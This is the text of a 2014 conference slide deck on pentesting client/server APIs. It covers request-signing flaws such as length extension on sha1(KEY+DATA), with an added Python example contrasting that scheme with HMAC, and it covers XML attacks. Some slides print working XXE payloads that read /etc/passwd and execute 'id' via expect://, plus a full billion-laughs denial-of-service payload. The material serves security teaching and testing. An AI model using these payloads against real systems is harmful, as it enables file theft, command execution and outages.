CodeFest 2014 - Pentesting client/server API
- 2. $ whoami
© 2002—2014, Digital Security 2
• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
- 3. What are we talking about?
API
- 12. Hacking via API
What should we test?
• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering
Developing
• Stop hacks and custom implementations in the API! Really.
- 19. Hacking via API
42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?
…4.5 Pb! http://www.unforgettable.dk/
- 24. Hacking via API
http://habrahabr.ru/post/186160/
- 26. Hacking via API
Query signing
Sign = sha*(…+DATA+…), with the APIkey inside the hashed input
- 29. Hacking via API
Say hello again to the length extension attack.
- 30. Hacking via API
A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)
- 31. Hacking via API
Someone has hijacked just one request…
- 32. Hacking via API
What does the attacker know?
• Original data
• Sign (token)
- 33. Hacking via API
What does the attacker want?
Change some data / change params
- 35. Hacking via API
Can sign a new query without the API key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU: sig = md5(uid + params + private_key)
http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
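Added example (written for this page, not code from the talk or from the services named on the slides): the signing layout from slide 30, sha1(KEY + DATA), with DATA concatenated without separators as on slide 35, beside an HMAC-based replacement with a canonical serialization. The key and parameter sets are constructed for the demo; the helper names are the author's own.

```python
import hashlib
import hmac
from urllib.parse import quote

# Constructed demo secret: not a key from the talk or from any real service.
API_KEY = b"demo-api-key"


def join_no_separator(params):
    """Serialization shown on the slide: name1=value1name2=value2 (no separator)."""
    return "".join(f"{k}={v}" for k, v in params.items()).encode()


def sign_weak(params, key=API_KEY):
    """Slide scheme: sha1(KEY + DATA). Two defects: a secret-prefix Merkle-Damgard
    hash is length-extendable, and the serialization is ambiguous, so distinct
    parameter sets can produce the same byte string and therefore the same token."""
    return hashlib.sha1(key + join_no_separator(params)).hexdigest()


def verify_weak(params, token, key=API_KEY):
    return sign_weak(params, key) == token  # plain '==' also leaks timing


def canonical(params):
    """Unambiguous serialization: sorted keys, '&' and '=' separators, and
    percent-escaping of those characters inside names and values."""
    items = sorted((str(k), str(v)) for k, v in params.items())
    return "&".join(f"{quote(k, safe='')}={quote(v, safe='')}" for k, v in items).encode()


def sign_hmac(params, key=API_KEY):
    """HMAC is not length-extendable, and canonical() binds exactly one parameter set."""
    return hmac.new(key, canonical(params), hashlib.sha256).hexdigest()


def verify_hmac(params, token, key=API_KEY):
    # compare_digest keeps the comparison time independent of where the digests differ.
    return hmac.compare_digest(sign_hmac(params, key), token)


def accepts_other_params(verify, sign, original, tampered):
    """True if a token issued for `original` is also accepted for `tampered`."""
    return verify(tampered, sign(original))
```

The check to run in a review is accepts_other_params() with two parameter sets that serialize to the same bytes under the weak layout: the weak verifier accepts the swap, the HMAC verifier does not.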
- 46. Hacking via API
DTD Example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">
XML example:
<author>&writer;&copyright;</author>
- 48. Hacking via API
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>
<foo>&xxe;</foo>
- 49. Hacking via API
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"expect://id" >]>
<foo>&xxe;</foo>
- 51. Hacking via API
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
- 52. What are we talking about?
Man in the Middle
- 55. Hacking via API
https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
- 56. Hacking via API
Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896
Development:
• Disable entities
- 57. Hacking via API
Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]